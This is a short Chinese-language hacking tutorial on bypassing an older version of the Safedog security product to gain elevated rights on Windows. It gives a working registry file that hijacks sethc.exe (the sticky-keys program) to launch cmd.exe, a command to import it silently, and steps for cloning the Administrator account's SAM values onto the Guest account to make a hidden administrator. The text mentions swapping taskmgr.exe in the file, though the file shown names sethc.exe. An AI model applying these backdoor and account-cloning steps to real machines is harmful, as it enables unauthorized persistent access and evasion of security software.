低版本安全狗绕过提权实战
执行reg文件实现shift提权
"regedit /s c:\11.reg"
11.reg内容:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe] "debugger"="c:\\windows\\system32\\cmd.exe"
11.reg 文件里 taskmgr.exe 可以替换成cmd.exe或者lusrmgr.msc [本地用户组管理]
通过lusrmgr.msc新建立一个帐号 如果不能新建帐号 则可以通过修改Guest用户的密码然后通过注册表进行对Guest用户的克隆 克隆方法如下
在任务管理器 输入regedit 或regedt32 打开注册表 寻找HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator
打开右侧的F值 将内容复制Guest对应的000001F5
打开右侧的F值 将内容粘贴到值中保存 就把Guest克隆成管理员权限了